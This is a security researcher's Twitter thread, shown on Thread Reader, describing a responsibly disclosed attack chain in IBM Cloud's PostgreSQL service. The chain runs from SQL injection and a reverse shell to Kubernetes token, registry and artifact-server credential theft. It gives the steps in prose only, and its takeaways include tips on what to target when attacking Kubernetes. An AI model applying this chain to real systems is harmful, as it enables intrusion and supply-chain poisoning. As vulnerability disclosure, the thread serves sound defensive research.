Nir Ohfeld Profile picture
Dec 8 โ€ข 16 tweets โ€ข 5 min read
We found a Remote Code Execution vulnerability in every #PostgreSQL database in #IBMCloud ๐Ÿ˜ฑ

Here is how we did it: ๐Ÿงต

#HellsKeychain
We set up a PostgreSQL instance in IBM Cloud and tried to execute code using the 'COPY FROM PROGRAM' statement. Unfortunately, this failed due to insufficient privileges. We were blocked! ๐Ÿšซ
We reviewed all IBM Cloud's proprietary functions that had the 'security definer' flag (meaning they will run as superuser). One of these functions had a SQL Injection vulnerability that we were able to exploit:
We exploited the SQLi to elevate our privileges to superuser and invoked a reverse shell:
We immediately realized that we were running in a K8s environment. Is this environment dedicated only to our account? ๐Ÿค” Let's find out.
After some basic recon we found the Kubernetes service account token. Using this token we can now query the K8s service API. Way to go! ๐ŸŽ‰
We queried the K8s API for the imagePullSecrets secret, which gave us plaintext credentials for the internal container registry of IBM Cloud
We pulled a few carefully selected images from the container registry and, as usual, scanned them using Yelp's secret scanning tool github.com/Yelp/detect-seโ€ฆ. This effort (surprisingly) yielded 0 useful secrets ๐Ÿ˜“
We decided to dig deeper, and unpacked each image to reveal its individual layers. This uncovered secrets hidden in the container's history section, which documents EVERY COMMAND USED DURING THE IMAGE BUILD PROCESS. Jackpot ๐Ÿค‘
The secrets we found inside the container's history section were used to pull packages and libraries from an internal artifact server for building the service's images. And, what do you know, they also had Read-Write permissions! ๐Ÿ’พ
With these secrets, we authenticated to the internal CI/CD artifact server and could theoretically poison the images that IBM Cloud distributes to all of their customers - performing a supply-chain attack from the CSP's end ๐Ÿ˜ฑ๐Ÿ˜ฑ
That would be a terribly irresponsible thing to do, so we just created a dummy file inside that repository to prove IBM Cloud that we could ๐Ÿค“
We disclosed our findings to IBM Cloud in the form of a three-part report. IBM Cloud rapidly investigated and fixed the vulnerabilities we discovered. IBM Cloud's security team took the issues very seriously and addressed them promptly and professionally ๐Ÿ’ชโœจ
๐Ÿšจ Oh, and did we mention that IBM also caught us red-handed during our research and let us continue because they understand the value of this sort of research? A prime example of a healthy security culture within an organization. Kudos!
Sounds interesting? Read the full technical details here ๐Ÿ‘‰ wiz.io/blog/hells-keyโ€ฆ
๐Ÿ’ก Two key takeaways from this thread:

1. When attacking K8s, target imagePullSecrets for access to container registry credentials.

2. Always scan container images (including layers and metadata files) for secrets.

#cybersecurity #k8s #containers #securitytips

โ€ข โ€ข โ€ข

Missing some Tweet in this thread? You can try to force a refresh
ใ€€

Keep Current with Nir Ohfeld

Nir Ohfeld Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(